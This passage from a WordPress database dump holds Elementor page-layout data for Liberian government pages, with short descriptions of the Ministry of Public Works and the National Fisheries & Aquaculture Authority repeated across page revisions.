irection\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"dae3b98\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:moa\\\" page_length=\\\"false\\\"]\",\"_title\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_z_index\":\"\",\"_element_id\":\"\",\"_css_classes\":\"\",\"jet_family_widget_is_order_orientaion\":\"false\",\"jet_family_widget_order_orientaion\":\"\",\"jet_family_widget_order_orientaion_tablet\":\"\",\"jet_family_widget_order_orientaion_mobile\":\"\",\"jet_family_widget_is_flex_basis\":\"false\",\"jet_family_widget_flex_basis\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"jet_family_widget_flex_basis_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"jet_family_widget_flex_basis_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_animation\":\"\",\"_animation_tablet\":\"\",\"_animation_mobile\":\"\",\"animation_duration\":\"\",\"_animation_delay\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b\":\"#f2295b\",\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_type\":\"linear\",\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_gradient_position\":\"center center\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_position_tablet\":\"\",\"_background_position_mobile\":\"\",\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_repeat_tablet\":\"\",\"_background_repeat_mobile\":\"\",\"_background_size\":\"\",\"_background_size_tablet\":\"\",\"_background_size_mobile\":\"\",\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_video_link\":\"\",\"_background_video_start\":\"\",\"_background_video_end\":\"\",\"_background_play_once\":\"\",\"_background_play_on_mobile\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_background_slideshow_gallery\":[],\"_background_slideshow_loop\":\"yes\",\"_background_slideshow_slide_duration\":5000,\"_background_slideshow_slide_transition\":\"fade\",\"_background_slideshow_transition_duration\":500,\"_background_slideshow_ken_burns\":\"\",\"_background_slideshow_ken_burns_zoom_direction\":\"in\",\"_background_hover_background\":\"\",\"_background_hover_color\":\"\",\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b\":\"#f2295b\",\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_type\":\"linear\",\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_gradient_position\":\"center center\",\"_background_hover_image\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_position\":\"\",\"_background_hover_position_tablet\":\"\",\"_background_hover_position_mobile\":\"\",\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_attachment\":\"\",\"_background_hover_repeat\":\"\",\"_background_hover_repeat_tablet\":\"\",\"_background_hover_repeat_mobile\":\"\",\"_background_hover_size\":\"\",\"_background_hover_size_tablet\":\"\",\"_background_hover_size_mobile\":\"\",\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_video_link\":\"\",\"_background_hover_video_start\":\"\",\"_background_hover_video_end\":\"\",\"_background_hover_play_once\":\"\",\"_background_hover_play_on_mobile\":\"\",\"_background_hover_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_slideshow_gallery\":[],\"_background_hover_slideshow_loop\":\"yes\",\"_background_hover_slideshow_slide_duration\":5000,\"_background_hover_slideshow_slide_transition\":\"fade\",\"_background_hover_slideshow_transition_duration\":500,\"_background_hover_slideshow_ken_burns\":\"\",\"_background_hover_slideshow_ken_burns_zoom_direction\":\"in\",\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_width_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_width_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_radius_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_radius_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0,0,0,0.5)\"},\"_box_shadow_box_shadow_position\":\" \",\"_border_hover_border\":\"\",\"_border_hover_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_hover_width_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_hover_width_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_hover_color\":\"\",\"_border_radius_hover\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_radius_hover_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_radius_hover_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_hover_box_shadow_type\":\"\",\"_box_shadow_hover_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0,0,0,0.5)\"},\"_box_shadow_hover_box_shadow_position\":\" \",\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_width\":\"\",\"_element_width_tablet\":\"\",\"_element_width_mobile\":\"\",\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_vertical_align\":\"\",\"_element_vertical_align_tablet\":\"\",\"_element_vertical_align_mobile\":\"\",\"_position\":\"\",\"_offset_orientation_h\":\"start\",\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_orientation_v\":\"start\",\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(14178,2262,'_elementor_controls_usage','a:5:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:2;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:2;s:21:\"typography_typography\";i:2;s:20:\"typography_font_size\";i:2;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(14179,2263,'_elementor_edit_mode','builder'),(14180,2263,'_elementor_template_type','wp-post'),(14181,2263,'_elementor_version','2.7.5'),(14182,2263,'_wp_page_template','default'),(14183,2263,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2f27869\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Department of Public Works was created by an Act of the National Legislature in 1928, and was later changed to the Ministry of Public Works in 1972 to adequately administer the Engineering component of the State in terms of surveying, drafting\\/designing, construction and supervision, to improve and maintain, direct or by contract all highways, bridges, roads, streets, airport, seaport, and all other public infrastructure in the Republic of Liberia.<\\/p><p>The Ministry sole purposes are surveying, drafting and designing construction and supervising construction contracts, and the maintenance of roads, bridges, and public buildings.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"cc92564\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Coming up\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"dae3b98\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:mpw\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(14186,2264,'_elementor_edit_mode','builder'),(14187,2264,'_elementor_template_type','wp-post'),(14188,2264,'_elementor_version','2.7.5'),(14189,2264,'_wp_page_template','default'),(14190,2264,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"aafb093\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The National Fisheries &amp; Aquaculture Authority was created by an Act of National Legislation on October 9, 2017. It functions as a fully-fledged autonomous body pursuant to the Public Authorities Law of the Republic of Liberia. NaFAA has its roots in the erstwhile Bureau of National Fisheries, which operated as a unit within the department of Technical services of the Ministry of Agriculture from 1956 to 2017.\\n\\nThe overall fisheries sector goal is: Sustainably managed and economically viable\\nfisheries that generate prosperity for the present and generations yet unborn.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e0171c3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(14193,2265,'_elementor_edit_mode','builder'),(14194,2265,'_elementor_template_type','wp-post'),(14195,2265,'_elementor_version','2.7.5'),(14196,2265,'_wp_page_template','default'),(14197,2265,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"aafb093\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The National Fisheries &amp; Aquaculture Authority was created by an Act of National Legislation on October 9, 2017. It functions as a fully-fledged autonomous body pursuant to the Public Authorities Law of the Republic of Liberia. NaFAA has its roots in the erstwhile Bureau of National Fisheries, which operated as a unit within the department of Technical services of the Ministry of Agriculture from 1956 to 2017.\\n\\nThe overall fisheries sector goal is: Sustainably managed and economically viable\\nfisheries that generate prosperity for the present and generations yet unborn.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(14199,2266,'_elementor_edit_mode','builder'),(14200,2266,'_elementor_template_type','wp-post'),(14201,2266,'_elementor_version','2.7.5'),(14202,2266,'_wp_page_template','default'),(14203,2266,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"aafb093\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The National Fisheries &amp; Aquaculture Authority was created by an Act of National Legislation on October 9, 2017. It functions as a fully-fledged autonomous body pursuant to the Public Authorities Law of the Republic of Liberia. NaFAA has its roots in the erstwhile Bureau of National Fisheries, which operated as a unit within the department of Technical services of the Ministry of Agriculture from 1956 to 2017.\\n\\nThe overall fisheries sector goal is: Sustainably managed and economically viable\\nfisheries that generate prosperity for the present and generations yet unborn.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured 